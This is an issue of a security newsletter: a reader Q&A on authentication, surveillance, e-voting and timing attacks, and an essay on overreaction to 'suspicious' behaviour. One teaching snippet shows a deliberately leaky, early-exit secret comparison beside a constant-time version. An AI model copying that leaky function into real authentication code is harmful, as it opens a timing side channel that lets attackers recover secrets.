Q: Can two-factor authentication really work on a Web site? Biometrics
isn’t feasible because most people don’t have the hardware. One-time
password tokens are a hassle, and they don’t really scale well. Image
identification and PC fingerprinting technology that some banks are
using is pretty easy to defeat with an evil proxy (i.e., any phishing
Web site).

A: Two-factor authentication works fine on some Web sites. My
employer, BT, uses two-factor access for the corporate network, and it
works great. Where two-factor authentication won’t work is in reducing
fraud in electronic banking, electronic brokerage accounts, and so on.
That’s because the problem isn’t an authentication problem. The
reasoning is subtle, and I’ve written about it here and here. What I
predicted will occur from two-factor authentication — and what we’re
seeing now — is that fraud will initially decrease as criminals shift
their attacks to organizations that have not yet deployed the
technology, but will return to normal levels as the technology becomes
ubiquitous and criminals modify their tactics to take it into account.
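To make concrete what a one-time-password token actually computes, here is a minimal sketch of the standard TOTP construction from RFC 6238 (with its HMAC-SHA1, 30-second, 6-digit defaults). This is a generic illustration, not any particular vendor's product. Note that because the code is simply a function of a shared secret and the current time, a real-time phishing proxy can relay it to the genuine site before it expires, which is exactly why this kind of second factor does not, by itself, stop the fraud discussed above.

```python
import hashlib
import hmac
import struct
import time


def totp(secret, at_time=None, step=30, digits=6):
    """Time-based one-time password per RFC 6238 (HMAC-SHA1 defaults)."""
    counter = int(time.time() if at_time is None else at_time) // step
    msg = struct.pack(">Q", counter)          # 8-byte big-endian time counter
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                   # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


# RFC 6238 Appendix B test vector: ASCII secret "12345678901234567890"
# at T=59 seconds yields "94287082" with 8 digits.
print(totp(b"12345678901234567890", at_time=59, digits=8))  # → 94287082
```

The server runs the same computation with the same secret and accepts a small window of adjacent counters to tolerate clock drift.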

Q: How much fun/mischief could you have if you were “evil” for a day?

A: It used to be a common late-night bar conversation at computer
security conferences: how would you take down the Internet, steal a
zillion dollars, neutralize the IT infrastructure of this company or
that country, etc. And, unsurprisingly, computer security experts have
all sorts of ideas along these lines.

This is true in many aspects of our society. Here’s what I said in my
book, Secrets and Lies (page 389): “As technology becomes more
complicated, society’s experts become more specialized. And in almost
every area, those with the expertise to build society’s infrastructure
also have the expertise to destroy it. Ask any doctor how to poison
someone untraceably, and he can tell you. Ask someone who works in
aircraft maintenance how to drop a 747 out of the sky without getting
caught, and he’ll know. Now ask any Internet security professional how
to take down the Internet, permanently. I’ve heard about half a dozen
different ways, and I know I haven’t exhausted the possibilities.”

What we hope is that as people learn the skills, they also learn the
ethics about when and when not to use them. When that doesn’t happen,
you get Mohamed Attas and Timothy McVeighs.

Q: In that vein, what is the most devilish idea you have thought of?

A: No comment.

Q: What’s your view on the difference between anonymity and privacy,
and which one do you think is more important for society? I’m thinking
primarily of security-camera paranoia (as if nosy neighbors hadn’t
been in existence for thousands of years).

A: There’s a huge difference between nosy neighbors and cameras.
Cameras are everywhere. Cameras are always on. Cameras have perfect
memory. It’s not the surveillance we’ve been used to; it’s wholesale
surveillance. I wrote about this here, and said this: “Wholesale
surveillance is a whole new world. It’s not ‘follow that car,’ it’s
‘follow every car.’ The National Security Agency can eavesdrop on
every phone call, looking for patterns of communication or keywords
that might indicate a conversation between terrorists. Many airports
collect the license plates of every car in their parking lots, and can
use that database to locate suspicious or abandoned cars. Several
cities have stationary or car-mounted license-plate scanners that keep
records of every car that passes, and save that data for later analysis.

“More and more, we leave a trail of electronic footprints as we go
through our daily lives. We used to walk into a bookstore, browse, and
buy a book with cash. Now we visit Amazon, and all of our browsing and
purchases are recorded. We used to throw a quarter in a toll booth;
now EZ Pass records the date and time our car passed through the
booth. Data about us are collected when we make a phone call, send an
e-mail message, make a purchase with our credit card, or visit a Web site.”

What’s happening is that we are all effectively under constant
surveillance. No one is looking at the data most of the time, but we
can all be watched in the past, present, and future. And while mining
this data is mostly useless for finding terrorists (I wrote about that
here), it’s very useful in controlling a population.

Cameras are just one piece of this, but they’re an important piece.
And what’s at stake is a massive loss of personal privacy, which I
believe has significant societal ramifications.

Q: Do you think it will ever be feasible to vote for public officials
via the Internet? Why or why not?

A: Internet voting has the same problems as electronic voting machines,
only more so. That being said, we are moving towards vote-by-mail and
(for the military) vote-by-fax. Just because something is a bad
security idea doesn’t mean it won’t happen.

Q: Hacker movies have become quite popular recently. Do any of them
have any basis in reality, or are the hacking techniques fabricated by Hollywood?

A: I’ve written a lot about what I call “movie-plot threats”: the
tendency of all of us to fixate on an elaborate and specific threat
rather than the broad spectrum of possible threats. We see this all
the time in our response to terrorism: terrorists with scuba gear,
terrorists with crop dusters, terrorists with exploding baby
carriages. It’s silly, really, but it’s human nature.

In the spirit of this silliness, on my blog I conducted two Movie-Plot
Threat Contests. (First contest rules and entries here, and winner
here. Second contest here and winner here.)

As to the movies: they all have some basis in reality, but it’s pretty
slim — just like all the other times science or technology is
portrayed in movies. Live Free or Die Hard is pure fiction.

Q: What would you consider to be the top five security vulnerabilities
commonly overlooked by programmers? What book would you recommend that
explains how to avoid these pitfalls?

A: It’s hard to make lists of “top” vulnerabilities, because they
change all the time. The SANS list is as good as any. Recommended
books include Ross Anderson’s Security Engineering, Gary McGraw’s
Software Security, and my own — coauthored with Niels Ferguson —
Practical Cryptography. A couple of years ago I wrote a reading list for
The Wall Street Journal, here.

Q: Can security companies really supply secure software for a stupid
user? Or do we just have to accept events such as those government
computer disks going missing in the UK which contained the personal
information of 25 million people (and supposedly had an underworld
value of $3 billion)?

A: I’ve written about that UK data loss fiasco, which seems to be
turning into a privacy Chernobyl for that country, here. Sadly, the
appropriate security measure — encrypting the files — is easy. Which
brings us to your question: how do we deal with stupid users? I stand
by what I said earlier: users will always be a problem, and the only
real solution is to limit the damage they can do. (Anyone who says
that the solution is to educate the users hasn’t ever met an actual user.)

Q: So seriously, do you shop on Amazon, or anywhere else online for
that matter?

A: Of course. I shop online all the time; it’s far easier than going
to a store, or even calling a mail-order phone number, if I know
exactly what I want.

What you’re really asking me is about the security. No one steals
credit card numbers one-by-one, by eavesdropping on the Internet
connection. They’re all stolen in blocks of a million by hacking the
back-end database. It doesn’t matter if you bought something over the
Internet, by phone, by mail, or in person — you’re equally vulnerable.

Q: Wouldn’t the world be simpler if we went back to “magic ink”? How
awesome was that stuff!

A: If you like invisible ink, I recommend you go buy a UV pen. Great
fun all around.

Q: If I visit Minneapolis anytime soon, what is one restaurant that I
would be wrong to pass up?

A: 112 Eatery. (Sorry, my review of it isn’t online.)

Q: What was the one defining moment in your life that you knew you
wanted to dedicate your life to computer security and cryptography?

A: I don’t know. Security is primarily a way of looking at the world,
and I’ve always looked at the world that way. As a child, I always
noticed security systems — in retail stores, in banks, in office
buildings — and how to defeat them. I remember accompanying my mother
to the voting booth, and noticing ways to break the security. So it’s
less of a defining moment and more of a slow process.

Q: What’s the worst security you’ve seen for a major financial firm? I
use ING and their site forces you to use just a 4-digit PIN.

A: There’s a lot of stupid security out there, and I honestly don’t
collect anecdotes anymore. I even have a name for security measures
that give the appearance of security without the reality: security
theater. Recently I wrote about security theater, and how the
psychological benefit is actually important.

Q: I read that AES and Twofish have protection against timing
analysis. How does that work?

A: What an esoteric question for such a general forum. There is
actually a timing attack against AES; a link to the specific attack,
and a description of timing attacks in general, is here. This is a
more general description of the attacks and defenses.
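A brief illustration of the principle (a generic example, not the AES attack itself; the real attacks on AES exploit data-dependent timing of its table lookups in the CPU cache): a timing side channel exists whenever how long an operation takes depends on secret data. The classic toy case is comparing a secret value byte-by-byte and returning at the first mismatch, which lets an attacker who times many attempts learn the length of the matching prefix. The defense is to do a fixed amount of work regardless of the data:

```python
import hmac


def naive_equal(a, b):
    """Leaky comparison: returns at the FIRST mismatching byte, so the
    running time reveals how long the matching prefix is."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True


def constant_time_equal(a, b):
    """hmac.compare_digest examines every byte no matter where a
    mismatch occurs, so timing does not depend on the contents."""
    return hmac.compare_digest(a, b)


# Both functions agree on the answer; they differ only in what
# their timing leaks to an observer.
assert naive_equal(b"secret", b"secret")
assert not constant_time_equal(b"secret", b"secreT")
```

Cipher designers apply the same idea at a lower level: make every execution path and memory access pattern independent of the key.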

Q: How does it feel to be an Internet meme?

A: Surreal. It’s surreal to be mentioned in The Da Vinci Code, to
appear before the House of Lords, or to answer questions for the
Freakonomics blog.

The hardest part is the responsibility. People take my words
seriously, which means that I can’t utter them lightly. If I say that
I use a certain product — PGP Disk, for example — people buy the
product and the company is happy. If, on the other hand, I call a
bunch of products “snake oil,” people don’t buy the products and the
companies occasionally sue me.

Q: Is it true that there is a giant database of every site we have
ever visited, and that with the right warrant a government agency
could know exactly where we’ve been? What are our real footprints on
the Web, and would it be possible for, say, an employer to someday
find out every site you visited in college? Is there a way to hide
your presence on sites that you believe to be harmless that others may
hold against you?

A: There really isn’t any good way to hide your Web self. There are
anonymization tools you can use — Tor for anonymous web browsing, for
example — but they have their own risks. What I said earlier applies
here, too; it’s impossible to function in modern society without
leaving electronic footprints on the Web or in real life.

Q: Is there any benefit to password protecting your home WiFi network?
I have IT friends who say the only real benefit is keeping other
users from slowing down the connection, and that there is no security
reason. Is this correct?

A: I run an open wireless network at home. There’s no password, and
there’s no encryption. Honestly, I think it’s just polite. Why should
I care if someone on the block steals wireless access from me? When my
wireless router broke last month, I used a neighbor’s access until I
replaced it.

Q: Why do large government agencies and companies continue to put
their faith in computer passwords, when we know that the human mind
cannot memorize multiple strong passwords? Why is so much more effort
put into password security than human security?

A: Because it’s easier. Never underestimate the power of doing the
easy stuff and ignoring the hard stuff.

Q: Do you still find that lying about successes in counter-terrorism
is an appropriate option for security experts commenting on these matters?

A: For those of you who don’t want to follow the links, they’re about
the German terrorist plot that was foiled in September, and about how
great a part electronic eavesdropping played in the investigation. As
I wrote earlier, as well as in the links attached to that answer, I
don’t think that wholesale eavesdropping is effective, and I
questioned then whether its use had anything to do with those arrests.
I still don’t have an answer one way or another, and made no
definitive claims in either of the two above links. If anyone does
have any information on the matter, I would appreciate hearing it.

Again, thank you all. That was fun. I hope I didn’t give you too many
links to read.


by Bruce Schneier, November 15, 2007

** *** ***** ******* *********** *************

The War on the Unexpected

We’ve opened up a new front on the war on terror. It’s an attack on the
unique, the unorthodox, the unexpected; it’s a war on different. If you
act different, you might find yourself investigated, questioned, and
even arrested — even if you did nothing wrong, and had no intention of
doing anything wrong. The problem is a combination of citizen informants
and a CYA (Cover Your Ass) attitude among police that results in a
knee-jerk escalation of reported threats.

This isn’t the way counterterrorism is supposed to work, but it’s
happening everywhere. It’s a result of our relentless campaign to
convince ordinary citizens that they’re the front line of terrorism
defense. “If you see something, say something” is how the ads read in
the New York City subways. “If you suspect something, report it” urges
another ad campaign in Manchester, UK. The Michigan State Police have
a seven-minute video. Administration officials from then-Attorney General
John Ashcroft to DHS Secretary Michael Chertoff to President Bush have
asked us all to report any suspicious activity.

The problem is that ordinary citizens don’t know what a real terrorist
threat looks like. They can’t tell the difference between a bomb and a
tape dispenser, electronic name badge, CD player, bat detector, or trash
sculpture; or the difference between terrorist plotters and imams,
musicians, or architects. All they know is that something makes them
uneasy, usually based on fear, media hype, or just something being different.

Even worse: after someone reports a “terrorist threat,” the whole system
is biased towards escalation and CYA instead of a more realistic threat assessment.

Watch how it happens. Someone sees something, so he says something.
The person he says it to — a policeman, a security guard, a flight
attendant — now faces a choice: ignore or escalate. Even though he
may believe that it’s a false alarm, it’s not in his best interests to
dismiss the threat. If he’s wrong, it’ll cost him his career. But if
he escalates, he’ll be praised for “doing his job” and the cost will be
borne by others. So he escalates. And the person he escalates to also
escalates, in a series of CYA decisions. And before we’re done, innocent
people have been arrested, airports have been evacuated, and hundreds
of police hours have been wasted.

This story has been repeated endlessly, both in the U.S. and in other
countries. Someone — these are all real — notices a funny smell, or
some white powder, or two people passing an envelope, or a dark-
skinned man leaving boxes at the curb, or a cell phone in an airplane seat;
the police cordon off the area, make arrests, and/or evacuate airplanes;
and in the end the cause of the alarm is revealed as a pot of Thai chili
sauce, or flour, or a utility bill, or an English professor recycling,
or a cell phone in an airplane seat.

Of course, by then it’s too late for the authorities to admit that they
made a mistake and overreacted, that a sane voice of reason at some
level should have prevailed. What follows is the parade of police and
elected officials praising each other for doing a great job, and
prosecuting the poor victim — the person who was different in the
first place — for having the temerity to try to trick them.

For some reason, governments are encouraging this kind of behavior.
It’s not just the publicity campaigns asking people to come forward and
snitch on their neighbors; they’re asking certain professions to pay
particular attention: truckers to watch the highways, students to
watch campuses, and scuba instructors to watch their students. The U.S.
wanted meter readers and telephone repairmen to snoop around houses. There’s
even a new law protecting people who turn in their travel mates based
on some undefined “objectively reasonable suspicion,” whatever that is.

If you ask amateurs to act as front-line security personnel, you
shouldn’t be surprised when you get amateur security.

We need to do two things. The first is to stop urging people to report
their fears. People have always come forward to tell the police when
they see something genuinely suspicious, and should continue to do so.
But encouraging people to raise an alarm every time they’re spooked
only squanders our security resources and makes no one safer.

We don’t want people to never report anything. A store clerk’s tip led
to the unraveling of a plot to attack Fort Dix last May, and in March
an alert Southern California woman foiled a kidnapping by calling the
police about a suspicious man carting around a person-sized crate. But
these incidents only reinforce the need to realistically assess, not
automatically escalate, citizen tips. In criminal matters, law
enforcement is experienced in separating legitimate tips from
unsubstantiated fears, and allocating resources accordingly; we should
expect no less from them when it comes to terrorism.

Equally important, politicians need to stop praising and promoting the
officers who get it wrong. And everyone needs to stop castigating, and
prosecuting, the victims just because they embarrassed the police by
their innocence.

Causing a city-wide panic over blinking signs, a guy with a pellet
gun, or stray backpacks is not evidence of doing a good job: it’s evidence
of squandering police resources. Even worse, it causes its own form of
terror, and encourages people to be even more alarmist in the future.
We need to spend our resources on things that actually make us safer, not
on chasing down and trumpeting every paranoid threat anyone can come
up with.


Some links didn’t make it into the original article: a creepy “if you
see a father holding his child’s hand, call the cops” campaign; a story
of an iPod found on an airplane; a story of an “improvised electronics
device” trying to get through airport security; and a good essay on the
“war on electronics.”

** *** ***** ******* *********** *************

by Bruce Schneier
Founder and CTO
BT Counterpane
schneier [at] schneier [dot] com

A free monthly newsletter providing summaries, analyses, insights, and
commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit

You can read this issue on the web. These same essays appear in the
“Schneier on Security” blog.